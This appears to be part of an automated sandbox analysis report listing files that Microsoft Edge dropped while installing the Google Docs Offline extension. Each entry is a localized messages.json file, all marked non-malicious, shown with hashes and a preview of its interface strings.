                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\lt\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1028
                                                                                                                                                                                                                                                                Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                                SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\lv\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):994
                                                                                                                                                                                                                                                                Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                                SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\ml\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2091
                                                                                                                                                                                                                                                                Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\mn\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2778
                                                                                                                                                                                                                                                                Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\mr\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1719
                                                                                                                                                                                                                                                                Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\ms\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):936
                                                                                                                                                                                                                                                                Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\my\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):3830
                                                                                                                                                                                                                                                                Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\ne\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1898
                                                                                                                                                                                                                                                                Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\nl\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):914
                                                                                                                                                                                                                                                                Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\nn\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):851
                                                                                                                                                                                                                                                                Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\no\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):878
                                                                                                                                                                                                                                                                Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\pa\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2766
                                                                                                                                                                                                                                                                Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\pl\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):978
                                                                                                                                                                                                                                                                Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\pt_BR\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):907
                                                                                                                                                                                                                                                                Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                Malicious:false
